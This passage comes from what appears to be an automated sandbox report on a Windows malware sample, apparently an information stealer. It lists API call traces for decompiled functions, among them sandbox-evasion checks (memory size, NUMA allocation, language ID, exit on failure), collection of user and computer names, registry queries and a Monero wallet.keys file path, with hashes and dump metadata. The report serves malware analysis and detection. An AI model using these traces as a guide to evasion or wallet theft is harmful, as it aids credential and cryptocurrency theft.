Part of subcall function 00971110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00971132
Part of subcall function 00971110: ExitProcess.KERNEL32 ref: 00971143

Part of subcall function 00971220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0097123E
Part of subcall function 00971220: __aulldiv.LIBCMT ref: 00971258
Part of subcall function 00971220: __aulldiv.LIBCMT ref: 00971266
Part of subcall function 00971220: ExitProcess.KERNEL32 ref: 00971294

Part of subcall function 00986770: GetUserDefaultLangID.KERNEL32 ref: 00986774

Part of subcall function 00971190: ExitProcess.KERNEL32 ref: 009711C6

Part of subcall function 00987850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009711B7), ref: 00987880
Part of subcall function 00987850: RtlAllocateHeap.NTDLL(00000000), ref: 00987887
Part of subcall function 00987850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0098789F

Part of subcall function 009878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987910
Part of subcall function 009878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00987917
Part of subcall function 009878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0098792F

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00848F18,?,0099110C,?,00000000,?,00991110,?,00000000,00990AEF), ref: 00986ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00986AE8
CloseHandle.KERNEL32(00000000), ref: 00986AF9
Sleep.KERNEL32(00001770), ref: 00986B04
CloseHandle.KERNEL32(?,00000000,?,00848F18,?,0099110C,?,00000000,?,00991110,?,00000000,00990AEF), ref: 00986B1A
ExitProcess.KERNEL32 ref: 00986B22

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 83a34d95bee36ca2d772829212f82723385cb19af1eadfeb876382b01a673071
Instruction ID: 5490fd526f9eaf68ce9034631e9432dd908e3aebcfae28d41f84868ec1b919aa
Opcode Fuzzy Hash: 83a34d95bee36ca2d772829212f82723385cb19af1eadfeb876382b01a673071
Instruction Fuzzy Hash: DC312F71D08208ABEB08FBF0DC56BEE7778AF94300F504519F212A6292DF796905C7A6

Function 009799C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009799EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00979A11
LocalAlloc.KERNEL32(00000040,?), ref: 00979A31
ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 00979A5A
LocalFree.KERNEL32(0097148F), ref: 00979A90
CloseHandle.KERNEL32(000000FF), ref: 00979A9A

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 158b9ab84bb250e1166363451e73d454f13003a9c4f24090e6b43eff6a0352d9
Instruction ID: 35fc7654e0b052c74d729d15782bc679e46cc940431ae64fd6a59c7711b66fef
Opcode Fuzzy Hash: 158b9ab84bb250e1166363451e73d454f13003a9c4f24090e6b43eff6a0352d9
Instruction Fuzzy Hash: 303128B4E00209EFDB14DFA4C885BAE77B9FF48310F108158E905A7390DB78AA41CFA1

Function 00984780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0084E470), ref: 009847DB

Part of subcall function 00988DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00988E0B

lstrcat.KERNEL32(?,00000000), ref: 00984801
lstrcat.KERNEL32(?,?), ref: 00984820
lstrcat.KERNEL32(?,?), ref: 00984834
lstrcat.KERNEL32(?,0083B680), ref: 00984847
lstrcat.KERNEL32(?,?), ref: 0098485B
lstrcat.KERNEL32(?,0084D840), ref: 0098486F

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 00988D90: GetFileAttributesA.KERNEL32(00000000,?,00971B54,?,?,0099564C,?,?,00990E1F), ref: 00988D9F

Part of subcall function 00984570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00984580
Part of subcall function 00984570: RtlAllocateHeap.NTDLL(00000000), ref: 00984587
Part of subcall function 00984570: wsprintfA.USER32 ref: 009845A6
Part of subcall function 00984570: FindFirstFileA.KERNEL32(?,?), ref: 009845BD

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 9df8a935c317622ce0b65d35e0f27f454ee0f05f13021708c01edf686b808c31
Instruction ID: e8882104497c2390a92aa1a6ffd860b63499ee9aef8892196a5fa80573e98b79
Opcode Fuzzy Hash: 9df8a935c317622ce0b65d35e0f27f454ee0f05f13021708c01edf686b808c31
Instruction Fuzzy Hash: EF3144B2D0021867CB14F7B0DC85FEE737CAB98700F404989B35997191EEB4A789CBA5

Function 00971220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0097123E
__aulldiv.LIBCMT ref: 00971258
__aulldiv.LIBCMT ref: 00971266
ExitProcess.KERNEL32 ref: 00971294

Strings

@, xrefs: 00971233

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: fcdcdfa75b825f8d964ea124efe051632fc5c5bfbbe47a31ed9e674964677b36
Instruction ID: 1091abcf3b8303217859d012c08af3ebd54f7bd000e4596a74048a25c3bc67d1
Opcode Fuzzy Hash: fcdcdfa75b825f8d964ea124efe051632fc5c5bfbbe47a31ed9e674964677b36
Instruction Fuzzy Hash: 03016DB1D44308FBEB10EBE4CC49B9EBB78AB44701F208149E709B62C1DBB459418B99

Function 009840B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,0084D740,00000000,00020119,?), ref: 009840F4
RegQueryValueExA.ADVAPI32(?,0084E5F0,00000000,00000000,00000000,000000FF), ref: 00984118
RegCloseKey.ADVAPI32(?), ref: 00984122
lstrcat.KERNEL32(?,00000000), ref: 00984147
lstrcat.KERNEL32(?,0084E578), ref: 0098415B

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: dbf63c5e4dfc5fb4dff3e5c311e221ce5cb114c9a1d81e0a275221bd1d9c7fcc
Instruction ID: 35c7cc9bcb3eb5336c8c661ad56031272b1570dc64217c031bd6fac087920f22
Opcode Fuzzy Hash: dbf63c5e4dfc5fb4dff3e5c311e221ce5cb114c9a1d81e0a275221bd1d9c7fcc
Instruction Fuzzy Hash: A741BBB7D101086BDB14FBA0DC56FFE733DAB88700F408658B61A57181EEB55B888BD2

Function 6C5DC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C5DC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C5DC969
GetSystemInfo.KERNEL32(?), ref: 6C5DC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C5DC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C5DC9E2

Memory Dump Source

Source File: 00000000.00000002.1958551840.000000006C5C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5C0000, based on PE: true

Associated: 00000000.00000002.1958527510.000000006C5C0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958610390.000000006C63D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958645334.000000006C64E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1958675490.000000006C652000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5c0000_file.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: ec550dadda410013529a30ee89d983287e65c35f44a5cad9f4b33a098be92ae0
Instruction ID: 99c4c5a79ea9f165a77f8a4dac837265f2c463877daa5fb4791794bb30ed1147
Opcode Fuzzy Hash: ec550dadda410013529a30ee89d983287e65c35f44a5cad9f4b33a098be92ae0
Instruction Fuzzy Hash: 33212F31741714ABDB04BB29CCC4BAE73B9AB87708F518519F90797780E7707C008799

Function 00987E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987E37
RtlAllocateHeap.NTDLL(00000000), ref: 00987E3E
RegOpenKeyExA.KERNEL32(80000002,0083BF30,00000000,00020119,?), ref: 00987E5E
RegQueryValueExA.KERNEL32(?,0084D9C0,00000000,00000000,000000FF,000000FF), ref: 00987E7F
RegCloseKey.ADVAPI32(?), ref: 00987E92

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 04120d5d3f0b42e25ab693050b8fd3823ab92265710977587e6f3be9b123ab24
Instruction ID: 2e30bd4d6a6d24c1a447937cff1cb08926771a6f94f4e54f906b0e69186cbbee
Opcode Fuzzy Hash: 04120d5d3f0b42e25ab693050b8fd3823ab92265710977587e6f3be9b123ab24
Instruction Fuzzy Hash: BE118CB1E44205EBD700DFD4DC89FBBBBB8EB44B00F204259F605A7690DBB858008BA1

Function 009712A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009712B4
RtlAllocateHeap.NTDLL(00000000), ref: 009712BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 009712D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009712F5
RegCloseKey.ADVAPI32(?), ref: 009712FF

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
